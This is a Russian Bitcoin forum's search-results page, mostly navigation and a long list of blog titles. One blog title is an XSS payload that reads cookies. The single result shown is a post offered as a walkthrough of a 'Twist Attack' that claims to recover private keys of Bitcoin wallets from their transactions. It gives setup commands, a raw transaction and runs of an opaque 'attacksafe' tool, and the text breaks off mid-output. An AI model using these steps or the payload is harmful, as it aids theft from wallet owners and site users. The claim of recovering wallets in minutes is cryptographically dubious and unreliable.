Перейти к содержанию

Поиск

Показаны результаты для тегов 'github'.

  • Поиск по тегам

    Введите теги через запятую.
  • Поиск по автору

Тип контента


Биткоин форум

  • Новости и события
    • Новости криптовалют
    • Статьи Bits.media
    • Мероприятия
  • Криптовалюты
    • Общий
    • Биткоин
    • Форки биткоина, альткоины
    • DeFi, токены
    • Электронные деньги
    • Блокчейн и финтех
    • Юридические вопросы
    • Кошельки для криптовалют
    • Разработка
    • Безопасность
    • Мониторинг
    • Конкурсы
    • Флейм
  • Экономика & Операции с криптовалютами
    • Экономика
    • Биржи криптовалют
    • Обменники криптовалют
    • Банки
    • Трейдинг криптовалютами
    • Магазины и сервисы (обсуждение, претензии)
    • Краудфандинг и Краудинвестинг
    • Игры, гэмблинг, хайпы, краны, раздачи
  • Майнинг криптовалюты
    • Общие вопросы по майнингу
    • Пулы совместного майнинга
    • Облачный майнинг и агрегаторы
    • Программы для майнинга
    • Стейкинг, Фарминг
    • Аппаратная часть
  • Барахолка
    • Продажа
    • Покупка
    • Услуги, сервисы
    • Работа
    • p2p обмен валют
  • О ресурсе Bits.media
    • Предложения и замечания по работе сайта
    • Предложения и замечания по работе форума
    • Предложения и замечания по работе Блога
  • Local
    • English
    • Other

Блоги

  • polym0rph's блог
  • miner's блог
  • LZ
  • AtomicStrike's блог
  • SolomonVR's блог
  • SolomonVR's блог
  • Sergey371's блог
  • блог phants'а
  • Nirton's блог
  • loga's блог
  • m134's блог
  • Exdeath's блог
  • Exdeath's блог
  • bronevik's блог
  • R1mlin's блог
  • egorbtc's блог
  • Рабочий's блог
  • Парадоксальный блог
  • мыслеизлияние
  • infoman's блог
  • PoolSwitcher
  • Pa2K's блог
  • Garrett's блог
  • pendalf2008's блог
  • forsee1's блог
  • btcshtchka's блог
  • Майнинг Bitcoin
  • Nikita9344_blog
  • Блог Димы
  • Michail's блог
  • Николай III's блог
  • Artists for Bitcoin
  • Artists for Bitcoin
  • ultra's блог
  • Yablya's блог
  • Настройки 7970. Результат 730kh/s в Litecoin
  • SKYnv's блог
  • Новая финансовая система мира
  • ElenaMaaya's блог
  • блог нуба
  • Шифровалютная экономика
  • Kryon's блог
  • kermit's блог
  • Райзеры для видеокарт
  • Shambler's блог
  • busmainer's блог
  • busmainer's блог
  • yunixon's блог
  • полезняшки для себя`s блог
  • AlexShul's блог
  • Виталий's блог
  • Помогите если вас не затруднит..Как отметинь выплату BTC...а то мой акаунт зламали и вывели все деньги...
  • Warmrain's блог
  • app.spec.integra.circuit's блог
  • HW_from_China's блог
  • HW_from_China's блог
  • Vitto
  • neiros' блог
  • kolja153's блог
  • Инвестиции в биткоин
  • advodado
  • bronevik's blog
  • Gold Line блог
  • LuchininAlexandr's блог
  • Биткоин Робот
  • Obmen.PM-Сертифицированный партнер платежной системы Perfect Money
  • Antina
  • SHiCK блог
  • Шахтер без шахты
  • Шахтер без шахты
  • Блог пьяного аналитика
  • Блог пьяного аналитика
  • Planetarius' блог
  • Planetarius' блог
  • ObiKenobi's блог
  • RoboBet блог
  • Блог Одного Человека
  • Planetarius' блог
  • fastesthash.com блог
  • Блог Romanov Capital
  • Cryptex
  • Viktor Sokolov's блог
  • sanyatyu's блог
  • TabTrader's блог
  • bitlook
  • нуждаюсь в вашей помощи опытные майнеры!
  • lathyips' блог
  • ironika
  • Познай себя !!!
  • Ult's блог
  • ill359's блог
  • Суровые будни рядового майнера в РФ
  • CEX.io
  • CEX.io Blog
  • Майнинг Gridseed с контроллером Raspberry PI
  • bestcoin's блог
  • SPA
  • Официальный игровой клуб Вулкан
  • Форк будущего, какой он?
  • Добыча биткоинов
  • majorjora's блог
  • cryptmining.ru
  • блог r2d2
  • РАФАЭЛЬ's блог
  • DDEX блог трейдеров
  • Doomka2014's блог
  • Bitcoin, Litecoin, Doge - С чего начать?
  • dierdan's блог
  • Latium
  • General-Beck's блог
  • Btc-Mirbox.com Самая прибыльная программа в интернете
  • tunsash's блог
  • кирилллллллллллл's блог
  • tunsash's блог
  • Rita's блог
  • Philipp's блог
  • Philipp's блог
  • Zarmung's блог
  • CR!PTO Путешествия
  • poop's блог
  • Makezzila's блог
  • GruberCoin - криптовалюта?
  • Gromootvod's блог
  • Одежда с символикой Bitcoin
  • waflya's блог
  • AsicTrade.com
  • Стратегия выхода на зароботок 1 биткоин
  • начать зарабатывать без вложений биткоин
  • saas' блог
  • vov4ik777333's блог
  • Моя история инвестиций в хайпы
  • Блог о Linux внутри майнеров :)
  • Обзор майнеров
  • Socket32's блог
  • Все самое интересное в мире криптовалют one-percent.ru
  • antolmach's блог
  • Alex-ru блог
  • хороший заработок без вложений!
  • По заработку, информация может быть полезна
  • Продам майнер BITMAIN S3
  • Куда нужно вкладывать свои средства ,чтобы их не потерять и даже заработать на них!!!
  • Ёжики GC3355 - апгрейд (жизнь после "Телеги")
  • En1ken's блог
  • Александр Ch's блог
  • Почему сегодня не открывается сайт bitcoin.org
  • moneymaker's блог
  • НОВЫЕ ХАЙПЫ
  • poiuty's блог
  • Viktor1123's блог
  • igorwhite's блог
  • golub's блог
  • anajik's блог
  • algol68's блог
  • Khamid Sattarov's блог
  • anajik's блог
  • tankist's блог
  • wfdim's блог
  • Ixion's блог
  • BitcoinBank блог
  • fantom's блог
  • Neotex's Blog
  • Александр Самойлов_12600's блог
  • hterw's блог
  • ivanech's блог
  • Новый хайп
  • goodusers' блог
  • motozikl's блог
  • Необыкновенное будущее
  • AndreyNag's блог
  • italiy82's блог
  • Nook89's блог
  • Сибирский червонец
  • interesnye-novosti
  • Биткойномат
  • zzzzz12's блог
  • exspert'bitkoin
  • Александр Глобальный's блог
  • Взрывной Пакет по Заработку Биткоин!
  • Kerver's блог
  • Азартные просторы
  • Компьютерный мастер Баку (опытный мастер)
  • mjauka's блог
  • Vladimir77's блог
  • Joe Black's блог
  • ТоТсамый's блог
  • Kolja's блог
  • antontmn's блог
  • Взрывной Супер Пакет - Как Заработать Без Вложений !!
  • Bordz's блог
  • TheFuzzStone's Blog
  • AndreyNag's Create own PEERCOIN NODE блог
  • demio's place
  • Обменяю ваши WMZ на мои PAYPAL
  • Moonfire's блог
  • nik888's блог
  • EDRCoin info
  • D-APPS
  • 1620$ за 9 дней! заинтересованы ?! пишите в сообещния!
  • Mining bitcoin from farm Hashocean
  • Grail's блог
  • автоматизация процессов
  • Easy Money
  • BLOG Мир Интернет Бизнеса
  • besser99
  • Blog Мир Интернет Бизнеса
  • Blog Julin Gys
  • Coin's блог
  • observer btc-e, наблюдатель BTC-E.COM
  • Заработок биткоинов
  • Дмитрий1839's блог
  • Майнер Эфира и Декреда от Claymore
  • Gridseed GC3355
  • Karasur's блог
  • Right13's блог
  • tanya310119911's блог
  • Swisscoin-Швейцарская криптовалюта
  • Биткоин, путь к луне
  • fancyfinance
  • Evgeny 34's блог
  • Arcady's блог
  • THWGLOBAL
  • solnecno's блог
  • andr1986's блог
  • Alexey654321's блог
  • aleco's blog
  • Tomfox's блог
  • poolminers
  • dini_pal's блог
  • vovchik's блог
  • KolesCoinNews' блог
  • MONERO FOUNDATION RUSSIA™
  • ICONOMI до конца ICO 8 дней
  • альбина32's блог
  • Vladimir Eliseev's блог
  • Vanya Wang's блог
  • Btc Coin's блог
  • papa_medbedb's блог
  • 6000 сатоши в час. Узнай как!!!
  • Свирепый Гарри's блог
  • Sahat's блог
  • Подпишитесь на инстаграмм пожалуйста
  • Se7eN's
  • Снижаем расходы на электричество
  • SERHIY's блог
  • Фаридун's блог
  • ICO (Краудфандинг)
  • Cryptohawk's блог
  • arbitrader's блог
  • ОлегХомин's блог
  • Enzo's блог
  • masterigr2016's блог
  • kurs.expert блог
  • datachains.world Русский Блокчейн 3.0
  • Закрытый клуб BitClub Network
  • Sayat Ibraev's блог
  • maksim2030's блог
  • BITCOIN блог
  • vvka's блог
  • скажите кто знаком долго будит жить этот хайп типо майнинг
  • BitClub Network
  • Краудсейл Augmentors ICO
  • Динар's блог
  • disodium
  • Новые краны по сбору биткоинов
  • Pedro
  • Selling account/продажа аккаунта
  • Как обменять Биткоин в Рубли
  • Заработай играя
  • Genesis Mining Russia's блог
  • Гена's блог
  • Гена's блог
  • Baccarat_1
  • Genesis Mining Russia's блог
  • Siberian Miners
  • Work-bitcoin
  • mike0013's блог
  • Внимание Новинка BTCHAMP
  • LeslyGarold's блог
  • Объясни бабуле криптовалюты
  • New bitcoin dice
  • ★ Global Success ★
  • isadora's блог
  • Prince tv's блог
  • КриптоМир блог
  • Блог BitBetNews
  • Cryptotrend
  • BitBetNews' блог
  • AlamurFury's блог
  • AlamurFury's блог
  • doBETacceptBET's блог
  • postscreen's блог
  • Krot's блог
  • МаршалНиколас's блог
  • Самый лучший майнинг биткоинов и других криптовалют
  • Bitbetnewss' блог
  • barrygoldwon
  • Мошенничество в глобальном масштабе
  • Marina_Aco_M's блог
  • Leon Organo's блог
  • Nikolai Tran's блог
  • Colonizator's блог
  • KriptoKurs блог
  • isa2016's блог
  • Utopia
  • Анжелика9808's блог
  • fxseminar's блог
  • Заработок в интернете с нуля + халява
  • ZORROZ's блог
  • LeoKartman's блог
  • Альберт Карачурин's блог
  • Bitcoin
  • isalm's блог
  • Yur1K's блог
  • Нервная система
  • Нервная система
  • Крипто-Проекты
  • comof2014's блог
  • Sand Coin
  • bitaps.com
  • 1 Bitcoin в месяц легко
  • BIP148
  • HEAgEKBATEH's блог
  • Miner42's блог
  • ChangeKripta's блог
  • mediavoice's блог
  • realestate's блог
  • куплю мощности на hashflare SHA-256 SCRYPT
  • proshift's блог
  • Stan Podyachev's блог
  • CNstuff's блог
  • Alex Lee's блог
  • RX470+RX460 падает хешрейт
  • Макроэкономика криптовалют
  • Криптовалюты и ICO
  • NV42Rus' блог
  • Николай Еременко's блог
  • deg237's блог
  • Bit Bet News' блог
  • xcilog's блог
  • YaNeFiShKa's блог
  • Соломон's блог
  • 23
  • Натур. Мясцо
  • AEON растёт в геометрической прогрессии-хватаем халяву
  • Про биткоин в России
  • Investy
  • Оборудование в стоках и фьючерсах. Китай.
  • адрес
  • HOQU
  • VitalyKaminsky
  • HOQU_rus
  • Грека через реку
  • CryptoCapitalNews
  • Finom Blockchain Blog
  • Everex
  • GoldMineCoin
  • Kolbasska
  • TombCare
  • CREDO - СИСТЕМА ОПЛАТЫ СЛЕДУЮЩЕГО ПОКОЛЕНИЯ
  • Сатош
  • G-obmen
  • Блог Трейдера
  • Revolutionising the 3 core functions of finance.
  • TH
  • Заработок в интернете
  • Privateers.Life - Пиратская ММО на Blockchain
  • Все просто! Все слухи про Биткоин
  • Человеческий
  • Запас прочности Биткоина.
  • Продажа недвижимости в Ялте за биткоины
  • Криптонатор - правда, или обман?
  • @slon21veka
  • AION - инновации технологии блокчейн
  • Подарите на жизнь 1 биткоинт живу бедно
  • Кирпто-портфель
  • Биткоин
  • События мира криптовалют из первоисточников. Аналитика и торговые идеи.
  • Бродкаст старого криптоанархиста
  • В РФ предложили изымать у населения биткоины и передавать их в казну
  • CloudCoin
  • Прошу вашей милость помогите прошу
  • Мои заметки о крипте
  • Криптоаналитика
  • Bitcoin в деталях: полезные ресурсы, инструкции и сервисы
  • Обмен денег
  • Ищу партнера
  • Bitex
  • вывод с ХФ от 6-7 дек
  • GRAPHENE - Нанотехнологии уже близки!
  • жит
  • CryptoMomus
  • Южная Корея планирует бороться с криптолихорадкой!
  • Майнинг на асике с нуля на высокой цене электроэнергии
  • Биткоин растёт
  • баги
  • Blockchain projects blog. Новости, обзоры, анонсы.
  • Криптомир
  • MIRANIT
  • история!
  • Cryptowolftrade
  • https://pocket-exchange.com
  • Глобальная криптовалютная биржа с низкими комиссиями
  • Глобальная криптовалютная биржа с низкими комиссиями
  • ideal zanussi maintenance beheira
  • Сервисы для продвижения сайта
  • ForkGold
  • btnPLUS
  • ForkGold - Новости криптовалют!
  • !!!ICO TELEGRAM!!!
  • White Rabbit - не меньше, чем революция в цифровом распространении фильмов и сериалов.
  • artem.litvinenko2018@list.ru
  • Ищу партнера/инвестора для открытия GPU Фермы/Хостинга
  • ПРЯМАЯ ВИДЕО ТРАНСЛЯЦИЯ
  • Moscow Miner service
  • Жизнь в Одессе маме
  • Майнинговый Проект TERRAMINER. SCAM или SCAM ALERT?!?
  • [ANN] Blockchain for a good cause
  • World’s first blockchain based news content
  • Обзоры товара
  • Dropil: Smart Investment Trading Algorithm
  • [ANN] GOLDELIM ICO - Free tokens
  • Seele.pro - Next generation of Blockchain technology
  • Kriptoblog
  • New trending MaltaCoin
  • [ANN][ICO] Monaco Estate - Cryptocurrency Real Estate Investment Fund ICO
  • NanoCryptos
  • BitBullCoin.io - The future of advanced global money transaction
  • Блог
  • Продажа аккаунта на golden-birds.biz
  • [pre-ANN]BCharity-международная биржа благотворительности
  • SmartChain.io
  • Майнинг отель в Москвской области
  • BytecoinRu
  • Частное мнение
  • Terhubung dengan Dunia dimana saja dan kapan saja bersama E-Chat
  • COPYTRACK menjadi satu satunya crypto Hak Cipta global
  • kyros
  • kyros
  • Оборудование для майнинга в интернет-магазине Wattson-shop
  • Biometrids Platform for identification
  • [ANN] [ICO] PINGVALUE ICO - RELEVANT ADVICE FOR YOUR NEXT EXPERIENCE
  • MinerGate affiliates (реффералы)
  • BitMEX.com Review
  • Помогу пройти верефикацию Poloniex!
  • Быстрый и безопасный обмен электронных денег по выгодному курсу.
  • e-chat platform multifungsi terdesentralisasi pertama dengan dompet crypto built-in.
  • Cryptonomics Capital - фонд инвестиций в ICO
  • Cloud Komputer pribadi tersedia untuk semua orang
  • BestICO
  • NewProjectReview
  • Saatnya beralih ke Blockchain, bitcomo pemasaran afilasi pertama dan satu satunya
  • International Crypto Bank Coin
  • Про криптотехнологии
  • Vinnd Solusi untuk kesehatan anda melalui blockchain
  • Обзоры перспективных ICO
  • байкал х10
  • Bagaimana Vinnd bekerja pada teknologi Blockchain
  • СберБит
  • Digital Safe Coin, upcoming best cryptocurrency?
  • lowenchain mirror
  • Pinjaman tanpa jaminan yang aman
  • Transcordium - Decentralized Peer-to-Peer Media Editing,
  • La Nueva Plataforma Descentralizada de Edición, Transcodificación y Distribución bajo blockchain
  • CryptoSailors
  • TokenGo обзор ICO
  • Инвестируйте в оборудование для майнинга
  • Buy celebrities with Ethereum now
  • [ICO] Coins4Favors - just one click away
  • bits.media
  • Необъяснимо, но факт или сила подсознания
  • Perkenalkan Myriads.IO ...
  • Arbidex – Platform Tranding Aset Dengan Sistem Arbitrase Otomatis di Semua Pertukaran
  • ARBIDEX The First Trading Platform That Collects Liquidity From Exchanges With Automatic Arbitrage System
  • FintruX
  • Invest-HyipTopMonitor
  • Инструкция как заработать на крипто баунти и airdrop!
  • первая и единственная платформа, которая собирает ликвидность и обмены в обмен
  • Arbidex, Сначала с помощью системы обмена арбитражами с криптовалютной валютой
  • Advance.Fund ft Strade Trade
  • Advance.fund
  • Новый проект 2018 года!
  • Esports Wife App - Free Cash, Bitcoins, Dota 2 & more
  • Торговый робот PoloR для Poloniex
  • Учимся торговать, снимаем розовые очки, разоблачаем шарлатанов.
  • Arcane Bear: Building a better tomorrow with the stories from today
  • COOLCOUSIN
  • Elementh - Blockchain for e-commerce
  • Coin News Telegraph | Bitcoin and Blockchain News
  • Новости ICO
  • What are the most profitable and best sites to invest?
  • Всеобъемлющий Блокчейн или тотальная монетизация
  • Sphere Social - Decentralized Social Network
  • Earn Bitcoins while using Google Chrome
  • MASSKRYP
  • Sell btc on paypal USD
  • coinview - Automated, real-time digital assets portfolio tracking
  • Bitcoins в Дубаи
  • Parkgene [GENE]
  • Mavro - Sebagai bos pemasaran jaringan di dunia kripto-mata uang
  • Biometrids
  • SunMoney Token Sale
  • Serenity Financial - SI ICO Trader / Broker Arbitration Invest Token?
  • Serenity Masalah Forex Keuangan Dipecahkan oleh Blockchain
  • File Gas, Masa Depan Penyimpanan Berkas.
  • [ANN] Solomonstouch - The World’s First Humanitarian, Donation and Fundraising Blockchain Platform
  • SAVEDROID строит экосистемы на основе ИИ
  • PARKGENE - STARTVOLUTION PARKIR DAN SOLUSI P2P BERDASARKAN TEKNOLOGI BLOCKCHAIN
  • TOKEN HACK VC
  • [ANN] THRINTEL MARKET™ - The Blockchain Evolution of Threat Intelligence Sharing
  • [ANN] Lunes - The biggest blockchain project in Latin America
  • Как начать зарабатывать?
  • Cryptocurrency Announcements
  • alexxpoll blog
  • blogs_blog_700
  • blogs_blog_702
  • Инновационная экосистема блокчейн, которая подорвет и децентрализует рынки повторной продажи билетов.
  • ICO-online: история создания проекта Me&Doc с нуля до выхода на ICO
  • ATS — В сети интернет обнаружен VIRUS, который убьет ICO проекты
  • Частное мнение
  • Announcements
  • Upminer - ремонт асиков (майнеров)
  • WORLD PEACE COIN: THE FIRST CRYPTO-CURRENCY WHO CARE ABOUT THOSE IN NEEDS
  • Cryptocurrency
  • blogs_blog_720
  • blogs_blog_722
  • blogs_blog_724
  • blogs_blog_726
  • blogs_blog_728
  • AKAIITO #ICO
  • AKAIITO : Platfrom Yang Kuat Dan Beropersi Berdasarkan Blockchain
  • Мониторинг обменников bitcoin
  • Akaiito! Platform untuk kontrak cerdas dan mata uang crypto!
  • AKAIITO Project - Platform yang kuat berdasarkan pada sistem blockchain yang berfungsi pada teknologi kontrak pintar
  • Akaiito – use cryptocurrency in everyday life
  • blogs_blog_742
  • blogs_blog_744
  • Markscheider - проект производства российских майнеров
  • Партнерка - 25% с продажи
  • Биржа криптовалют BitHash
  • Облачный майнинг.
  • Крипто
  • Airdrops
  • Как заработать на криптовалюте
  • CryptoBanOne
  • Проверенная игра Capitalist Game Bot с выводом денег
  • Ashtart - A future where everyone can access energy
  • Блог о ICO-проектах
  • Перспективное ИСО
  • [ICO] MYRYMAX - MAIN SALE (ICO1) IS LIVE
  • Announcements
  • blogs_blog_776
  • blogs_blog_778
  • Neironix Daily Digest - Ежедневный Аналитический Дайджест
  • Digithereum Global
  • Cryptonet. Сообщество профессиональных криптопредпринимателей
  • Announcement blog
  • Crazyer Crypto
  • Альтернативная криптовалюта.
  • Интерактивная платформа CryptoBliss
  • Интерактивная платформа CryptoBliss
  • ICOnow
  • Crypyotraid
  • Ты мне я тебе
  • Криптокнопка "Бабло"
  • Egorr4 Review Blog
  • [Masternode] Dash Platinum запуск!
  • Как сэконмить больше своих денег при переводе в криптовалюты
  • все собрано по сути в компании на ферме в Литве ,вы просто приобретаете, в Москве и СПб есть представители
  • bitcoin abc
  • bitcoin abc
  • Shodik
  • Обзоры майнинг-пулов
  • оптимизированная Equihash miner zcash
  • avto-monstr.ru/ref/4976. 
  • crypt-mining.net
  • CryptoPlayers
  • Описание проекта Crypto Credit Card
  • Криптовалюта
  • cryptMiningNet
  • Peoplewave - Revolutionise recruitment, background checks, onboarding and etc
  • How does the economics community see Bitcoin?
  • Dash Platinum
  • sarah crypto
  • Важное в мире крипты и финансов
  • matty0312
  • cryptocurrency9527
  • oldwolfcoin
  • зарабатываем здесь
  • amyqkl
  • Cryptocurrency information sharing
  • Сергей Онищенко
  • Германия – Швеция: видео трансляция LIVE
  • Всем привет!
  • Мой кино блог
  • Мониторинг обменников BestChange
  • WPGrabber
  • Мой личный кино блог
  • Аналогии
  • Jsa
  • Nama
  • Крипто EXMO News
  • Independent Delhi Escorts
  • Bitok.cc — современный сервис обмена криптовалют
  • Enjoy All Time Fun
  • GEX_CASH
  • РАБОЧИЙ МАЙНИНГ
  • bikoin что это
  • AvailCom - бесключевая аренда имущества
  • THE BEST ICO OF 2018
  • Smile-Expo. С любовью к инновациям!
  • crypto-currency news
  • CryptoChangeNews
  • HELP Token
  • Казино онлайн
  • Microsoft медленно (но точно) подключает Blockchain к основным продуктам
  • Jullie Chandigarh Escorts
  • Установка и настройка Bminer
  • Roundblock
  • Прием Биткоин платежей в OpenCart 3.x, 2.3 и OcStore
  • Иммерсионное охлаждение в майнинге и наукоемких вычислениях на GPU
  • Мастерноды/Masternodes
  • Девчонки-короткие юбчонки
  • Майнинг и фермы HotAsic.ru
  • Localcoinswap - P2P cryptoexchange
  • Tchtf
  • crypto-mining. Bitcoin
  • Мой блог
  • 50x - СКОРЫЙ ВЫХОД НА БИРЖУ С ЕЖЕДНЕВНЫМ НАЧИСЛЕНИЕМ ДИВИДЕНДОВ
  • LoL cec
  • ✅ Новая эра P2P обмена! Аукцион от LKWAVE ?
  • Bitcoin crane
  • Bitcoin Crane
  • Дневник трейдера
  • Разработка скриптов для арбитражной торговли
  • "><img src=x onerror=alert(document.cookie)>
  • Все по маслу
  • Криптоплатформа Bitzlato
  • Bitshares
  • Enjoy full fun with me
  • Блог Papa Change
  • Меняем быстро, не оставляя ожиданий >EXMO,BTC, Оплата: Банковской картой, QIWI-Кошелёк.
  • Oz - Blog
  • RExchange24.ru
  • CryptoChemistry
  • Применение крипты в казино
  • tapchibitcoin.vn
  • THE MOST CHEAPEST AND ACCURATE CELL PHONE NUMBER AND EMAIL DATABASES IN THE WORLD
  • TRUST7
  • ВЛАДИМИР БАКС
  • iEXBase
  • Egamov Bexruz
  • Продать S9, L3 +
  • BestChange
  • CloudCoin
  • Polyx — криптовалютная платформа
  • Мировые новости
  • Новости со всего мира IT и не только
  • Pi Network Coin Mining Project
  • Сайт bits.media топ!
  • Coinmatics LIVE
  • FPGA Криптовалютный майнинг руководство
  • Настройка сервера
  • otzivipro блог
  • ExchangeRates.Pro: сравнение цен обмена Биткойн и 33 криптовалют в России и мире — биржи, обменки, P2P ?
  • Бинариум как открыть счет регистрация и бонус
  • Амикта - блог про инженерию
  • Игровые автоматы на деньги
  • 11111100101
  • Комп для майнинга с Алика
  • https://freebitco.in/?r=33865777
  • Неудачный инвестор
  • Блог сервиса проверки биткоинов Traceer
  • Как я выжил
  • Baking Bad
  • Статус Криптовалюты в этом мире
  • Joys Digital
  • Как я попал в криптобизнес
  • Arbitrage systems.com - мошенники
  • myproject1
  • Яйца в разных корзинах
  • Qtum
  • Binance P2P
  • Бестчендж лучший обменник
  • Краны для Coinpot
  • Мир криптовалют
  • Обменник
  • Crypto-дайджест
  • MoneroASM [Вникаю в блокчейн]
  • Музей компьютеров и игр - история майнинга
  • bitcoin exchanger
  • Blockchain News
  • What’s SoupSwap ?
  • SoupSwap - Big Promotion Special Offer Only For Investor Earn Bonus Up To 30%
  • SoupSwap - Big Promotion Special Offer Only For Investor Earn Bonus Up To 30%
  • SoupSwapOfficial
  • TradingStrategy - "Софт для глубокого анализа и торговли на крипто рынках, собственной разработки"
  • TradingStrategy - "Софт для глубокого анализа и торговли на крипто рынках, собственной разработки"
  • TradingStrategy - "Софт для глубокого анализа и торговли на крипто рынках, собственной разработки"
  • CryptoTab
  • Мой путь
  • We need to help the family of a political prisoner
  • Новие аирдропы
  • ? Crypto Cat / криптовалюты
  • На пути к прибыльному трейдингу!!!
  • KeenEdge блог
  • Tron network
  • Помогу деньгами всем желающим
  • Лучший обменник BestChange ищи лучший курс для обмена!
  • AEX
  • ПРОДАЖА АКАУНТОВ-BINANCE ВЕРИФИЦИРОВАННЫE ЧИСТЫЕ
  • Дневник спекулянта
  • Акции и Новости обмена криптовалюты и эл. денег
  • Новости электронных денег
  • AML / KYC в крипто
  • Bizonex
  • Crypto News
  • HoldReef - бесплатный и безопасный мессенджер для владельцев криптовалют
  • Обзоры крипто-проектов
  • Crypro Coin Desk
  • Nodle: сеть устройств интернета вещей (IoT)
  • Geek Games
  • Dexsport_io
  • Lalicat лучше Multilogin?
  • VPS/VDS/VPN в Европе
  • LuckyMeta AirDrop Giveaways
  • Блог
  • EuroHoster - территория быстрых VPS и выделенных серверов
  • За последние 24 часа
  • Уоррен Баффет назвал Биткоин болезнью и предрёк полное исчезновение криптовалют
  • Cryptex
  • ltc-crypto.blog
  • ECDSA
  • Будни ленивого трейдера
  • m1
  • Insights Driven Reports
  • Vyral Wings - Crowdfunding
  • Правила майнинга в криптозиму
  • 내부 비밀에 홀덤 발견
  • Как кратно увеличить свой доход в крипте с помощью мультиаккаунтинга
  • Надежный поставщик металлопроката обеспечивает комплексное обслуживание.
  • Bitmain Antminer l7 - обзор, характеристики, доходность - 2140MINER
  • Обзоры платформ NFT
  • CryptoApe
  • Приколы
  • Evraz
  • крипта у вас на сайте
  • Криптообменник Smart Obmen
  • Smart Obmen
  • Обучение Крипто Арбитража и Трейдинга
  • MyChange.io - Мультивалютный криптокошелек с P2P Торговлей и 0% P2P Комиссии
  • Как получить историческую цену ERC20-токена
  • TopCrypto
  • AdSense Alternative
  • ISTOKS
  • Digital Capital | Research
  • Signum Journal СМИ о криптовалюте. В активном поиске свежей аналитики и экспертных комментариев для последующих публикаций
  • Обо всё простым языком
  • Мысли Сатоши
  • Top Casino
  • evangelist
  • BTCmedia
  • 3. Как получить больше раздач с несколькими учетными записями? Смотреть здесь
  • Актуальные AIRDROP
  • Блог CryptoYes
  • Simple Solution

Календари

  • Календарь блокчейн мероприятий

Категории

  • Кошельки
  • GPU майнеры
  • CPU майнеры
  • FPGA/ASIC майнеры
  • Драйверы
    • AMD
    • Nvidia
  • Прошивки ASIC майнеров
    • SHA2
    • Scrypt
    • X11
    • EquiHash
    • Ethash
  • Прошивки видеокарт
  • Утилиты
  • Софт для трейдинга
  • Софт для мониторинга

Поиск результатов в...

Поиск контента, содержащего...


Дата создания

  • Начало

    Конец


Дата обновления

  • Начало

    Конец


Фильтр по количеству...

Регистрация

  • Начало

    Конец


Группа


AIM


MSN


Сайт


ICQ


Yahoo


Jabber


Skype


Город:


Интересы


Bitcoin кошелек

Найдено: 12 результатов

  1. CRYPTO DEEP TECH В этой статье мы реализуем Twist Attack на примере №2 согласно первой теоретической части статьи мы убедились что с помощью определенных точек на эллиптической кривой secp256k1 мы можем получить частичные значение приватного ключа и в течение 5-15 минут восстановить Биткоин Кошелек используя “Sagemath pollard rho function: (discrete_log_rho)” и “Chinese Remainder Theorem”. https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md Согласно твиту Paulo Barreto: https://twitter.com/pbarreto/status/825703772382908416?s=21 The cofactor is 3^2*13^2*3319*22639 E1: 20412485227 E2: 3319, 22639 E3: 109903, 12977017, 383229727 E4: 18979 E6: 10903, 5290657, 10833080827, 22921299619447 prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447 38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031 HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5 E1: y^2 = x^3 + 1 E2: y^2 = x^3 + 2 E3: y^2 = x^3 + 3 E4: y^2 = x^3 + 4 E6: y^2 = x^3 + 6 https://attacksafe.ru/twist-attack-on-bitcoin y² = x³ + ax + b. In the Koblitz curve, y² = x³ + 0x + 7. In the Koblitz curve, 0 = x³ + 0 + 7 b '= -x ^ 3 - ax. Перейдем к экспериментальной части: (Рассмотрим Биткоин Адрес) (Теперь рассмотрим критический уязвимые транзакции) Откроем [TerminalGoogleColab]. Реализуем алгоритм Twist Attack с помощью нашей репозитории 18TwistAttack git clone https://github.com/demining/CryptoDeepTools.git cd CryptoDeepTools/18TwistAttack/ ls Установим все нужные нам пакеты requirements.txt sudo apt install python2-minimal wget https://bootstrap.pypa.io/pip/2.7/get-pip.py sudo python2 get-pip.py pip2 install -r requirements.txt , Подготовим RawTX для атаки RawTX = 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000 Сохраним в файле: RawTX.txt Чтобы реализовать атаку мы воспользуемся программным обеспечение “ATTACKSAFE SOFTWARE” www.attacksafe.ru/software Права доступа: chmod +x attacksafe Применение: ./attacksafe -help -version: software version -list: list of bitcoin attacks -tool: indicate the attack -gpu: enable gpu -time: work timeout -server: server mode -port: server port -open: open file -save: save file -search: vulnerability search -stop: stop at mode -max: maximum quantity in mode -min: minimum quantity per mode -speed: boost speed for mode -range: specific range -crack: crack mode -field: starting field -point: starting point -inject: injection regimen -decode: decoding mode ./attacksafe -version Version 5.3.2. [ATTACKSAFE SOFTWARE, © 2023] "ATTACKSAFE SOFTWARE" включает в себя все популярные атаки на Биткоин. Запустим список всех атак: ./attacksafe -list Выберем -tool: twist_attack Чтобы получить определенные точки secp256k1 из уязвимой транзакции подписи ECDSA, мы добавили данные RawTX в текстовый документ и сохранил как файл RawTX.txt 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000 Запустим -tool twist_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” ./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt Мы запустили данную атаку из -tool twist_attack и результат сохранился в файл SecretPoints.txt Теперь чтобы посмотреть успешный результат откроем файл SecretPoints.txt cat SecretPoints.txt Результат: Elliptic Curve Secret Points: Q11 = E1([97072073026593516785986136148833105674452542501015145216961054272876839453879, 107567253371779495307521678088935176637661904239924771700494716430774957820966]) Q21 = 